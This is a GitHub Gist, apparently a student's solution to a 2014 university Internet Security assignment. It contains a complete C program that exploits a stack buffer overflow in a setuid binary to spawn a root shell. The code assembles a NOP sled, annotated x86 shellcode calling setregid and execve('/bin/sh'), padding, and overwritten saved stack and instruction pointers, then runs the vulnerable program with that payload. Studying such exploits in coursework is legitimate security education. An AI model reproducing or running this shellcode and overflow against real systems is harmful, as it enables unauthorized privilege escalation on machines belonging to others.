Created
May 24, 2014 12:57
-
-
Save bountin/c3994a923385d987ed27 to your computer and use it in GitHub Desktop.
Using a stack overflow to spawn a root shell off a setuid executable - University assignment of Internet Security 1 in the summer term of 2014
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> // printf | |
#include <stdlib.h> // malloc | |
#include <string.h> // strlen strncpy | |
#include <unistd.h> //execl | |
char nop = '\220'; | |
char *shellcode = | |
// setregid(-1, 201) | |
"\x29\xc0" // subl %eax, %eax | |
"\xb0\x47" // movb $71, %al <-- Syscall 71 = setregid | |
"\x29\xdb" // subl %ebx, %ebx <-- Nullify first parameter | |
"\xb3\xc9" // movb $201, %bl <-- Second param: group => 201 (which will residue first in ebx ...) | |
"\x89\xd9" // movl %ebx, %ecx <-- Now the second param is in place | |
"\x29\xdb" // subl %ebx, %ebx <-- Again nullify first parameter | |
"\x83\xeb\x01" // sub %ebx, -1 <-- First param: user => -1 (= no change) | |
"\xcd\x80" // int $0x80 | |
// Preparations of the shell execution | |
"\xeb\x1f" // jmp 0x1f <-- 1) Go to the last call stmt to get the address of the string | |
"\x5e" // popl %esi <-- and ff. all that adress finding fun | |
"\x89\x76\x08" // movl %esi,0x8(%esi) | |
"\x31\xc0" // xorl %eax,%eax | |
"\x88\x46\x07" // movb %eax,0x7(%esi) | |
"\x89\x46\x0c" // movl %eax,0xc(%esi) | |
// execve("/bin/sh", "sh") | |
"\xb0\x0b" // movb $0xb,%al <-- Syscall 11 = execve | |
"\x89\xf3" // movl %esi,%ebx <-- First param: adress of the /bin/sh string | |
"\x8d\x4e\x08" // leal 0x8(%esi),%ecx <-- Second param: argv[0] = programe name = sh | |
"\x8d\x56\x0c" // leal 0xc(%esi),%edx <-- Third param: null pointer | |
"\xcd\x80" // int $0x80 <-- Kernel mode! | |
// exit(0) | |
"\x31\xdb" // xorl %ebx,%ebx <-- First param: 0 | |
"\x89\xd8" // movl %ebx,%eax | |
"\x40" // inc %eax <-- Syscall 1 = exit | |
"\xcd\x80" // int $0x80 <-- Kernel mode! | |
"\xe8\xdc\xff\xff\xff" // call -0x24 <-- 1) Go back to the normal program run | |
// "/bin/grade" | |
"/bin/sh " | |
"---"; | |
void main(int argc, char* argv[]) { | |
int i; | |
int offset = 0; | |
int nops = 185 - strlen(shellcode); | |
int argument_size = nops + sizeof shellcode + 106 + 1 + 8 + 4 + 4 + 10; | |
char* evil_argument = malloc(argument_size +1); | |
if (evil_argument == NULL) { | |
printf("malloc failed"); | |
exit(1); | |
} | |
// Prepare the nop sledge | |
for (i=0; i<nops; i++) { | |
evil_argument[offset++] = nop; | |
} | |
// Add shellcode | |
strncpy(&evil_argument[nops], shellcode, strlen(shellcode)); | |
offset += strlen(shellcode); | |
// Add 106 Bytes filler | |
for (i=0; i<106; i++) { | |
evil_argument[offset++] = '.'; | |
} | |
// Length stack element | |
evil_argument[offset++] = '\52'; | |
// 8 Bytes filler | |
for (i=0; i<9; i++) { | |
evil_argument[offset++] = '.'; | |
} | |
// \250\365\377\277 (= saved stack pointer) | |
strncpy(&evil_argument[offset], "\250\365\377\277", 4); | |
offset += 4; | |
// \200\364\377\277 (= saved eip) | |
strncpy(&evil_argument[offset], "\xe0\xf4\xff\xbf", 4); | |
offset += 4; | |
evil_argument[offset++] = '\0'; | |
execl ("/usr/local/bin/vuln1", "/usr/local/bin/vuln1", evil_argument, (char *)NULL); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment